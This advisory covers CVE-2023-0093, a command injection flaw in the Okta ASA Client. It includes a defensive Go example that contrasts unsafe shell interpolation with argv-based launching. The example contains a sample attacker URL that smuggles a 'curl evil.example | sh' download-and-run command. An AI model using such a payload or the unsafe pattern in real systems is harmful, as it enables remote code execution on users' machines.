Okta Advanced Server Access Client CVE-2023-0093
Okta Advanced Server Access Client versions 1.13.1 through 1.68.1 are vulnerable to command injection due to the third-party library webbrowser.
Affected product and versions
Okta’s Advanced Server Access customers that have currently installed or previously had installed versions 1.13.1 through 1.68.1 of the Okta Advanced Server Access Client.
The vulnerability is fixed in Okta Advanced Server Access Client version 1.68.2. To remediate this vulnerability, upgrade to version 1.68.2 or later.
An outdated version of the third-party webbrowser library used by the ASA client was found to be vulnerable to command injection. To exploit this issue, an attacker would need to phish the user into entering an attacker-controlled server URL during enrollment, so the attack requires user interaction and is rated high complexity.
Vulnerability Type: OS Command Injection
Vector string: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
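The following is an added illustration of the vulnerability class described above; it is not Okta's code and not the code of the webbrowser library, and it does not reproduce that library's internals. It assumes a Linux client that hands the enrollment URL to the xdg-open launcher, and the attacker URL is a constructed sample. The unsafe path shows what happens when the URL is interpolated into a string that a shell parses; the hardened path validates the URL and passes it as a single argv element with no shell involved.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"os/exec"
	"regexp"
	"strings"
)

// shellMeta lists characters that let a URL escape from a shell command line
// (command separators, pipes, substitution, quoting and whitespace).
const shellMeta = "&|;`$(){}<>\"'\\ \t\n"

// hostRe accepts a plain DNS-style host with an optional numeric port.
// It deliberately rejects userinfo, IPv6 brackets and anything exotic.
var hostRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9.-]*(:[0-9]{1,5})?$`)

// unsafeCommandLine is the vulnerable pattern: the user-supplied URL is spliced
// into one string that a shell will tokenize. It is returned, never executed,
// so the injected command is visible in the result.
func unsafeCommandLine(rawURL string) string {
	return fmt.Sprintf("sh -c '%s'", "xdg-open "+rawURL)
}

// validateEnrollmentURL rejects anything that is not a clean https URL before it
// is allowed anywhere near a process launcher.
func validateEnrollmentURL(raw string) (string, error) {
	if strings.ContainsAny(raw, shellMeta) {
		return "", errors.New("url contains shell metacharacters")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	if u.Scheme != "https" {
		return "", errors.New("only https enrollment servers are allowed")
	}
	if u.User != nil || !hostRe.MatchString(u.Host) {
		return "", errors.New("unexpected host component")
	}
	return u.String(), nil
}

// openURL is the hardened form: the launcher receives the URL as its own argv
// element via exec.Command, so no shell ever parses it. The *exec.Cmd is
// returned rather than started, which keeps the example side-effect free.
func openURL(raw string) (*exec.Cmd, error) {
	clean, err := validateEnrollmentURL(raw)
	if err != nil {
		return nil, err
	}
	return exec.Command("xdg-open", clean), nil // assumed Linux launcher
}

func main() {
	// Constructed attacker-controlled enrollment URL: after the real host the
	// shell sees a second command.
	attacker := "https://asa.example.com/;curl${IFS}evil.example/x|sh"
	fmt.Println("unsafe:", unsafeCommandLine(attacker))
	if _, err := openURL(attacker); err != nil {
		fmt.Println("hardened rejects it:", err)
	}
	cmd, _ := openURL("https://asa.example.com/enroll")
	fmt.Println("hardened argv:", cmd.Args)
}
```

The check runs before URL parsing on purpose: net/url accepts characters such as `;` inside a host, so a parser alone is not a filter. Rejecting the whole input is safer than trying to quote it, because the quoting rules differ between `sh -c` and `cmd /c start` and a single missed case is enough.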
Okta would like to thank Tao Sauvage from Anvil Secure for assistance on this finding.